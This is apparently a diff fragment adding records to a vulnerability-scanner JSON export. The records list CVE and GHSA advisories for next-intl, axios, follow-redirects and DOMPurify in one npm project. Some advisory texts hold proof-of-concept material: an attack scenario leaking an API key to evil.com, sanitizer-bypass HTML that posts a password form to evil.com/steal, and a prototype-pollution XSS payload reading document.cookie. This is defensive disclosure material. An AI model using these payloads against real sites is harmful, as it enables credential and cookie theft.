+                "description": "### Impact\n\nApplications using the `next-intl` middleware with `localePrefix: 'as-needed'` could construct URLs where path handling and the WHATWG URL parser resolved a relative redirect target to another host (e.g. scheme-relative `//` or control characters stripped by the URL parser), so the middleware could redirect the browser off-site while the user still started from a trusted app URL.\n\n### Patches\n\nThe problem has been patched, please update to [`next-intl@4.9.1`](https://github.com/amannn/next-intl/releases/tag/v4.9.1).\n\n### Credits\n\nMany thanks to [Joni Liljeblad](https://github.com/joniumGit) from [Oura](https://ouraring.com) for responsibly disclosing the vulnerability and for suggesting the fix.",
+                "source": "GITHUB",
+                "published": "2026-04-10 21:03:55.0",
+                "title": "next-intl has an open redirect vulnerability",
+                "cwes": [
+                    {
+                        "cweId": 601,
+                        "name": "URL Redirection to Untrusted Site ('Open Redirect')"
+                    }
+                ],
+                "uuid": "745542e0-0dc8-477a-a38e-5e60c8ff6613",
+                "severityRank": 2,
+                "cweName": "URL Redirection to Untrusted Site ('Open Redirect')",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:1a0ff72f-8ce5-4d27-ba9e-89e4e8ee11ba:745542e0-0dc8-477a-a38e-5e60c8ff6613",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "axios",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/axios@1.13.6",
+                "uuid": "4589322c-61b1-49bf-b38f-9a92cf588681",
+                "version": "1.13.6",
+                "latestVersion": "1.15.2"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-11 23:55:03.875"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 4.8,
+                "vulnId": "CVE-2026-40175",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-fvcv-3m26-pcqx",
+                        "cveId": "CVE-2026-40175"
+                    }
+                ],
+                "references": "* [https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c](https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c)\n* [https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1](https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1)\n* [https://github.com/axios/axios/pull/10660](https://github.com/axios/axios/pull/10660)\n* [https://github.com/axios/axios/pull/10660#issuecomment-4224168081](https://github.com/axios/axios/pull/10660#issuecomment-4224168081)\n* [https://github.com/axios/axios/pull/10688](https://github.com/axios/axios/pull/10688)\n* [https://github.com/axios/axios/releases/tag/v0.31.0](https://github.com/axios/axios/releases/tag/v0.31.0)\n* [https://github.com/axios/axios/releases/tag/v1.15.0](https://github.com/axios/axios/releases/tag/v1.15.0)\n* [https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx](https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx)",
+                "cweId": 113,
+                "description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
+                "epssScore": 0.00028,
+                "source": "NVD",
+                "published": "2026-04-10 20:16:22.8",
+                "cwes": [
+                    {
+                        "cweId": 113,
+                        "name": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"
+                    },
+                    {
+                        "cweId": 444,
+                        "name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"
+                    },
+                    {
+                        "cweId": 918,
+                        "name": "Server-Side Request Forgery (SSRF)"
+                    }
+                ],
+                "uuid": "c2a1d8da-f348-4121-b7fb-9760f74ef851",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')",
+                "epssPercentile": 0.07911
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:4589322c-61b1-49bf-b38f-9a92cf588681:c2a1d8da-f348-4121-b7fb-9760f74ef851",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "next-intl",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/next-intl@4.8.3",
+                "uuid": "1a0ff72f-8ce5-4d27-ba9e-89e4e8ee11ba",
+                "version": "4.8.3",
+                "latestVersion": "4.9.1"
+            },
+            "attribution": {
+                "alternateIdentifier": "CVE-2026-40299",
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-13 23:55:45.326",
+                "referenceUrl": "https://ossindex.sonatype.org/vulnerability/CVE-2026-40299?component-type=npm&component-name=next-intl&utm_source=dependency-track&utm_medium=integration&utm_content=v4.14.0"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "CVE-2026-40299",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-8f24-v5vv-gm5j",
+                        "cveId": "CVE-2026-40299"
+                    }
+                ],
+                "references": "* [https://github.com/amannn/next-intl/commit/1c80b668aa6d853f470319eec10a3f61e78a70e6](https://github.com/amannn/next-intl/commit/1c80b668aa6d853f470319eec10a3f61e78a70e6)\n* [https://github.com/amannn/next-intl/pull/2304](https://github.com/amannn/next-intl/pull/2304)\n* [https://github.com/amannn/next-intl/releases/tag/v4.9.1](https://github.com/amannn/next-intl/releases/tag/v4.9.1)\n* [https://github.com/amannn/next-intl/security/advisories/GHSA-8f24-v5vv-gm5j](https://github.com/amannn/next-intl/security/advisories/GHSA-8f24-v5vv-gm5j)",
+                "cvssV4Score": 6.9,
+                "cweId": 601,
+                "description": "next-intl provides internationalization for Next.js. Applications using the `next-intl` middleware prior to version 4.9.1with `localePrefix: 'as-needed'` could construct URLs where path handling and the WHATWG URL parser resolved a relative redirect target to another host (e.g. scheme-relative `//` or control characters stripped by the URL parser), so the middleware could redirect the browser off-site while the user still started from a trusted app URL. The problem has been patchedin `next-intl@4.9.1`.",
+                "epssScore": 0.00054,
+                "source": "NVD",
+                "published": "2026-04-17 21:16:34.707",
+                "cwes": [
+                    {
+                        "cweId": 601,
+                        "name": "URL Redirection to Untrusted Site ('Open Redirect')"
+                    }
+                ],
+                "uuid": "27228620-102e-44d2-8346-92644c4aef52",
+                "severityRank": 2,
+                "cweName": "URL Redirection to Untrusted Site ('Open Redirect')",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
+                "epssPercentile": 0.16817
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:1a0ff72f-8ce5-4d27-ba9e-89e4e8ee11ba:27228620-102e-44d2-8346-92644c4aef52",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "follow-redirects",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/follow-redirects@1.15.11",
+                "uuid": "e10eabcb-458b-4d95-8f58-df246c57b358",
+                "version": "1.15.11",
+                "latestVersion": "1.16.0"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-14 12:14:57.951"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-r4q5-vmmm-2653",
+                "aliases": [],
+                "references": "* [https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653](https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653)\n* [https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9](https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9)\n* [https://github.com/advisories/GHSA-r4q5-vmmm-2653](https://github.com/advisories/GHSA-r4q5-vmmm-2653)",
+                "cvssV4Score": 6.9,
+                "cweId": 200,
+                "description": "## Summary\n\nWhen an HTTP request follows a cross-domain redirect (301/302/307/308), `follow-redirects` only strips `authorization`, `proxy-authorization`, and `cookie` headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., `X-API-Key`, `X-Auth-Token`, `Api-Key`, `Token`) is forwarded verbatim to the redirect target.\n\nSince `follow-redirects` is the redirect-handling dependency for **axios** (105K+ stars), this vulnerability affects the entire axios ecosystem.\n\n## Affected Code\n\n`index.js`, lines 469-476:\n\n```javascript\nif (redirectUrl.protocol !== currentUrlParts.protocol &&\n   redirectUrl.protocol !== \"https:\" ||\n   redirectUrl.host !== currentHost &&\n   !isSubdomain(redirectUrl.host, currentHost)) {\n  removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers);\n}\n```\n\nThe regex only matches `authorization`, `proxy-authorization`, and `cookie`. Custom headers like `X-API-Key` are not matched.\n\n## Attack Scenario\n\n1. App uses axios with custom auth header: `headers: { 'X-API-Key': 'sk-live-secret123' }`\n2. Server returns `302 Location: https://evil.com/steal`\n3. follow-redirects sends `X-API-Key: sk-live-secret123` to `evil.com`\n4. Attacker captures the API key\n\n## Impact\n\nAny custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js.\n\n## Suggested Fix\n\nAdd a `sensitiveHeaders` option that users can extend, or strip ALL non-standard headers on cross-domain redirect.\n\n## Disclosure\n\nSource code review, manually verified. Found 2026-03-20.",
+                "source": "GITHUB",
+                "published": "2026-04-14 01:11:11.0",
+                "title": "follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets",
+                "cwes": [
+                    {
+                        "cweId": 200,
+                        "name": "Exposure of Sensitive Information to an Unauthorized Actor"
+                    }
+                ],
+                "uuid": "b5b25644-060f-455a-9465-67da1da6e22a",
+                "severityRank": 2,
+                "cweName": "Exposure of Sensitive Information to an Unauthorized Actor",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:e10eabcb-458b-4d95-8f58-df246c57b358:b5b25644-060f-455a-9465-67da1da6e22a",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "axios",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/axios@1.13.6",
+                "uuid": "4589322c-61b1-49bf-b38f-9a92cf588681",
+                "version": "1.13.6",
+                "latestVersion": "1.15.2"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-15 23:20:19.548"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 9.9,
+                "vulnId": "CVE-2025-62718",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-3p68-rc4w-qgx5",
+                        "cveId": "CVE-2025-62718"
+                    }
+                ],
+                "references": "* [https://datatracker.ietf.org/doc/html/rfc1034#section-3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1)\n* [https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2)\n* [https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c](https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c)\n* [https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df](https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df)\n* [https://github.com/axios/axios/pull/10661](https://github.com/axios/axios/pull/10661)\n* [https://github.com/axios/axios/pull/10688](https://github.com/axios/axios/pull/10688)\n* [https://github.com/axios/axios/releases/tag/v0.31.0](https://github.com/axios/axios/releases/tag/v0.31.0)\n* [https://github.com/axios/axios/releases/tag/v1.15.0](https://github.com/axios/axios/releases/tag/v1.15.0)\n* [https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5](https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5)",
+                "cvssV4Score": 6.3,
+                "cweId": 441,
+                "description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L",
+                "epssScore": 0.00035,
+                "source": "NVD",
+                "published": "2026-04-09 15:16:08.65",
+                "cwes": [
+                    {
+                        "cweId": 441,
+                        "name": "Unintended Proxy or Intermediary ('Confused Deputy')"
+                    },
+                    {
+                        "cweId": 918,
+                        "name": "Server-Side Request Forgery (SSRF)"
+                    }
+                ],
+                "uuid": "7a287e6d-2df0-47a7-974d-81d49e533223",
+                "severityRank": 2,
+                "cweName": "Unintended Proxy or Intermediary ('Confused Deputy')",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
+                "epssPercentile": 0.10437
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:4589322c-61b1-49bf-b38f-9a92cf588681:7a287e6d-2df0-47a7-974d-81d49e533223",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "dompurify",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/dompurify@3.3.3",
+                "uuid": "c3cf13d0-de48-4aae-ad53-710da9a90825",
+                "version": "3.3.3",
+                "latestVersion": "3.4.1"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-16 11:11:53.186"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-39q2-94rc-95cp",
+                "aliases": [],
+                "references": "* [https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp](https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp)\n* [https://github.com/advisories/GHSA-39q2-94rc-95cp](https://github.com/advisories/GHSA-39q2-94rc-95cp)",
+                "cvssV4Score": 5.3,
+                "cweId": 783,
+                "description": "## Summary\nIn `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via `EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to short-circuit evaluation.\n\nThe condition:\n```\n!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])\n```\nWhen `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept \u2014 `FORBID_TAGS[tagName]` is never evaluated.\n\n## Inconsistency\nThis contradicts the attribute-side pattern at line 1214 where `FORBID_ATTR` explicitly wins first:\n```\nif (FORBID_ATTR[lcName]) { continue; }\n```\nFor tags, FORBID should also take precedence over ADD.\n\n## Impact\nApplications using both `ADD_TAGS` as a function and `FORBID_TAGS` simultaneously get unexpected behavior \u2014 forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency.\n\n## Suggested Fix\nCheck `FORBID_TAGS` before `tagCheck`:\n```\nif (FORBID_TAGS[tagName]) { /* remove */ }\nelse if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }\n```\n\n## Affected Version\nv3.3.3 (commit 883ac15)",
+                "source": "GITHUB",
+                "published": "2026-04-16 00:46:35.0",
+                "title": "DOMPurify's ADD_TAGS function form bypasses FORBID_TAGS due to short-circuit evaluation",
+                "cwes": [
+                    {
+                        "cweId": 783,
+                        "name": "Operator Precedence Logic Error"
+                    }
+                ],
+                "uuid": "84e708ba-e52d-4467-ab28-92f8af65e560",
+                "severityRank": 2,
+                "cweName": "Operator Precedence Logic Error",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:c3cf13d0-de48-4aae-ad53-710da9a90825:84e708ba-e52d-4467-ab28-92f8af65e560",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "follow-redirects",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/follow-redirects@1.15.11",
+                "uuid": "e10eabcb-458b-4d95-8f58-df246c57b358",
+                "version": "1.15.11",
+                "latestVersion": "1.16.0"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-22 23:25:12.153"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 7.5,
+                "vulnId": "CVE-2026-40895",
+                "aliases": [],
+                "references": "* [https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653](https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653)",
+                "cvssV4Score": 6.9,
+                "cweId": 200,
+                "description": "follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. Prior to 1.16.0, when an HTTP request follows a cross-domain redirect (301/302/307/308), follow-redirects only strips authorization, proxy-authorization, and cookie headers (matched by regex at index.js). Any custom authentication header (e.g., X-API-Key, X-Auth-Token, Api-Key, Token) is forwarded verbatim to the redirect target. This vulnerability is fixed in 1.16.0.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
+                "epssScore": 0.00042,
+                "source": "NVD",
+                "published": "2026-04-21 21:16:44.337",
+                "cwes": [
+                    {
+                        "cweId": 200,
+                        "name": "Exposure of Sensitive Information to an Unauthorized Actor"
+                    }
+                ],
+                "uuid": "aa836a97-5cb0-401b-b230-efcf4e457886",
+                "severityRank": 2,
+                "cweName": "Exposure of Sensitive Information to an Unauthorized Actor",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
+                "epssPercentile": 0.12816
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:e10eabcb-458b-4d95-8f58-df246c57b358:aa836a97-5cb0-401b-b230-efcf4e457886",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "dompurify",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/dompurify@3.3.3",
+                "uuid": "c3cf13d0-de48-4aae-ad53-710da9a90825",
+                "version": "3.3.3",
+                "latestVersion": "3.4.1"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-22 23:25:18.21"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-h7mw-gpvr-xq4m",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-h7mw-gpvr-xq4m",
+                        "cveId": "CVE-2026-41240"
+                    }
+                ],
+                "references": "* [https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m](https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m)\n* [https://github.com/cure53/DOMPurify/releases/tag/3.4.0](https://github.com/cure53/DOMPurify/releases/tag/3.4.0)\n* [https://github.com/advisories/GHSA-h7mw-gpvr-xq4m](https://github.com/advisories/GHSA-h7mw-gpvr-xq4m)",
+                "cvssV4Score": 6,
+                "cweId": 79,
+                "description": "There is an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used.\n\nCommit [c361baa](https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80) added an early exit for FORBID_ATTR at line 1214:\n\n    /* FORBID_ATTR must always win, even if ADD_ATTR predicate would allow it */\n    if (FORBID_ATTR[lcName]) {\n      return false;\n    }\n\nThe same fix was not applied to FORBID_TAGS. At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely:\n\n    if (\n      !(\n        EXTRA_ELEMENT_HANDLING.tagCheck instanceof Function &&\n        EXTRA_ELEMENT_HANDLING.tagCheck(tagName)  // true -> short-circuits\n      ) &&\n      (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])  // never evaluated\n    ) {\n\nThis allows forbidden elements to survive sanitization with their attributes intact.\n\nPoC (tested against current HEAD in Node.js + jsdom):\n\n    const DOMPurify = createDOMPurify(window);\n\n    DOMPurify.sanitize(\n      '<iframe src=\"https://evil.com\"><\/iframe>',\n      {\n        ADD_TAGS: function(tag) { return true; },\n        FORBID_TAGS: ['iframe']\n      }\n    );\n    // Returns: '<iframe src=\"https://evil.com\"><\/iframe>'\n    // Expected: '' (iframe forbidden)\n\n    DOMPurify.sanitize(\n      '<form action=\"https://evil.com/steal\"><input name=password><\/form>',\n      {\n        ADD_TAGS: function(tag) { return true; },\n        FORBID_TAGS: ['form']\n      }\n    );\n    // Returns: '<form action=\"https://evil.com/steal\"><input name=\"password\"><\/form>'\n    // Expected: '<input name=\"password\">' (form forbidden)\n\nConfirmed affected: iframe, object, embed, form. The src/action/data attributes survive because attribute sanitization runs separately and allows these URLs.\n\nCompare with FORBID_ATTR which correctly wins:\n\n    DOMPurify.sanitize(\n      '<p onclick=\"alert(1)\">hello<\/p>',\n      {\n        ADD_ATTR: function(attr) { return true; },\n        FORBID_ATTR: ['onclick']\n      }\n    );\n    // Returns: '<p>hello<\/p>' (onclick correctly removed)\n\nSuggested fix: add FORBID_TAGS early exit before the tagCheck evaluation, mirroring line 1214:\n\n    /* FORBID_TAGS must always win, even if ADD_TAGS predicate would allow it */\n    if (FORBID_TAGS[tagName]) {\n      // proceed to removal logic\n    }\n\nThis requires function-based ADD_TAGS in the config, which is uncommon. But the asymmetry with the FORBID_ATTR fix is clear, and the impact includes iframe and form injection with external URLs.\n\nReporter: Koda Reef",
+                "source": "GITHUB",
+                "published": "2026-04-22 17:34:17.0",
+                "title": "DOMPurify: FORBID_TAGS bypassed by function-based ADD_TAGS predicate (asymmetry with FORBID_ATTR fix)",
+                "cwes": [
+                    {
+                        "cweId": 79,
+                        "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+                    },
+                    {
+                        "cweId": 183,
+                        "name": "Permissive List of Allowed Inputs"
+                    }
+                ],
+                "uuid": "76f9e793-48e0-40fd-9c2c-bfb60a48add1",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:c3cf13d0-de48-4aae-ad53-710da9a90825:76f9e793-48e0-40fd-9c2c-bfb60a48add1",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "dompurify",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/dompurify@3.3.3",
+                "uuid": "c3cf13d0-de48-4aae-ad53-710da9a90825",
+                "version": "3.3.3",
+                "latestVersion": "3.4.1"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-22 23:25:18.259"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 6.9,
+                "vulnId": "GHSA-v9jr-rg53-9pgp",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-v9jr-rg53-9pgp",
+                        "cveId": "CVE-2026-41238"
+                    }
+                ],
+                "references": "* [https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp](https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp)\n* [https://github.com/cure53/DOMPurify/releases/tag/3.4.0](https://github.com/cure53/DOMPurify/releases/tag/3.4.0)\n* [https://github.com/advisories/GHSA-v9jr-rg53-9pgp](https://github.com/advisories/GHSA-v9jr-rg53-9pgp)",
+                "cweId": 79,
+                "description": "## Summary\n\nDOMPurify versions 3.0.1 through 3.3.3 (latest) are vulnerable to a prototype pollution-based XSS bypass. When an application uses `DOMPurify.sanitize()` with the default configuration (no `CUSTOM_ELEMENT_HANDLING` option), a prior prototype pollution gadget can inject permissive `tagNameCheck` and `attributeNameCheck` regex values into `Object.prototype`, causing DOMPurify to allow arbitrary custom elements with arbitrary attributes \u2014 including event handlers \u2014 through sanitization.\n\n## Affected Versions\n\n- **3.0.1 through 3.3.3** (current latest) \u2014 all affected\n- **3.0.0 and all 2.x versions** \u2014 NOT affected (used `Object.create(null)` for initialization, no `|| {}` reassignment)\n- The vulnerable `|| {}` reassignment was introduced in the 3.0.0→3.0.1 refactor\n- This is **distinct** from GHSA-cj63-jhhr-wcxv (USE_PROFILES Array.prototype pollution, fixed in 3.3.2)\n- This is **distinct** from CVE-2024-45801 / GHSA-mmhx-hmjr-r674 (__depth prototype pollution, fixed in 3.1.3)\n\n## Root Cause\n\nIn `purify.js` at line 590, during config parsing:\n\n```javascript\nCUSTOM_ELEMENT_HANDLING = cfg.CUSTOM_ELEMENT_HANDLING || {};\n```\n\nWhen no `CUSTOM_ELEMENT_HANDLING` is specified in the config (the default usage pattern), `cfg.CUSTOM_ELEMENT_HANDLING` is `undefined`, and the fallback `{}` is used. This plain object inherits from `Object.prototype`.\n\nLines 591-598 then check `cfg.CUSTOM_ELEMENT_HANDLING` (the original config property) \u2014 which is `undefined` \u2014 so the conditional blocks that would set `tagNameCheck` and `attributeNameCheck` from the config are never entered.\n\nAs a result, `CUSTOM_ELEMENT_HANDLING.tagNameCheck` and `CUSTOM_ELEMENT_HANDLING.attributeNameCheck` resolve via the prototype chain. If an attacker has polluted `Object.prototype.tagNameCheck` and `Object.prototype.attributeNameCheck` with permissive values (e.g., `/.*/`), these polluted values flow into DOMPurify's custom element validation at lines 973-977 and attribute validation, causing all custom elements and all attributes to be allowed.\n\n## Impact\n\n- **Attack type:** XSS bypass via prototype pollution chain\n- **Prerequisites:** Attacker must have a prototype pollution primitive in the same execution context (e.g., vulnerable version of lodash, jQuery.extend, query-string parser, deep merge utility, or any other PP gadget)\n- **Config required:** Default. No special DOMPurify configuration needed. The standard `DOMPurify.sanitize(userInput)` call is affected.\n- **Payload:** Any HTML custom element (name containing a hyphen) with event handler attributes survives sanitization\n\n## Proof of Concept\n\n```javascript\n// Step 1: Attacker exploits a prototype pollution gadget elsewhere in the application\nObject.prototype.tagNameCheck = /.*/;\nObject.prototype.attributeNameCheck = /.*/;\n\n// Step 2: Application sanitizes user input with DEFAULT config\nconst clean = DOMPurify.sanitize('<x-x onfocus=alert(document.cookie) tabindex=0 autofocus>');\n\n// Step 3: \"Sanitized\" output still contains the event handler\nconsole.log(clean);\n// Output: <x-x onfocus=\"alert(document.cookie)\" tabindex=\"0\" autofocus=\"\">\n\n// Step 4: When injected into DOM, XSS executes\ndocument.body.innerHTML = clean; // alert() fires\n```\n\n### Tested configurations that are vulnerable:\n\n| Call Pattern | Vulnerable? |\n|---|---|\n| `DOMPurify.sanitize(input)` | YES |\n| `DOMPurify.sanitize(input, {})` | YES |\n| `DOMPurify.sanitize(input, { CUSTOM_ELEMENT_HANDLING: null })` | YES |\n| `DOMPurify.sanitize(input, { CUSTOM_ELEMENT_HANDLING: {} })` | NO (explicit object triggers L591 path) |\n\n## Suggested Fix\n\nChange line 590 from:\n```javascript\nCUSTOM_ELEMENT_HANDLING = cfg.CUSTOM_ELEMENT_HANDLING || {};\n```\n\nTo:\n```javascript\nCUSTOM_ELEMENT_HANDLING = cfg.CUSTOM_ELEMENT_HANDLING || create(null);\n```\n\nThe `create(null)` function (already used elsewhere in DOMPurify, e.g., in `clone()`) creates an object with no prototype, preventing prototype chain inheritance.\n\n### Alternative application-level mitigation:\n\nApplications can protect themselves by always providing an explicit `CUSTOM_ELEMENT_HANDLING` in their config:\n\n```javascript\nDOMPurify.sanitize(input, {\n  CUSTOM_ELEMENT_HANDLING: {\n    tagNameCheck: null,\n    attributeNameCheck: null\n  }\n});\n```\n\n## Timeline\n\n- **2026-04-04:** Vulnerability discovered during automated DOMPurify fuzzing research (Fermat project)\n- **2026-04-04:** Confirmed in Chrome browser with DOMPurify 3.3.3\n- **2026-04-04:** Verified distinct from GHSA-cj63-jhhr-wcxv and CVE-2024-45801\n- **2026-04-04:** Advisory drafted, responsible disclosure initiated\n\n## Credit\n\nhttps://github.com/trace37labs",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
+                "source": "GITHUB",
+                "published": "2026-04-22 17:31:32.0",
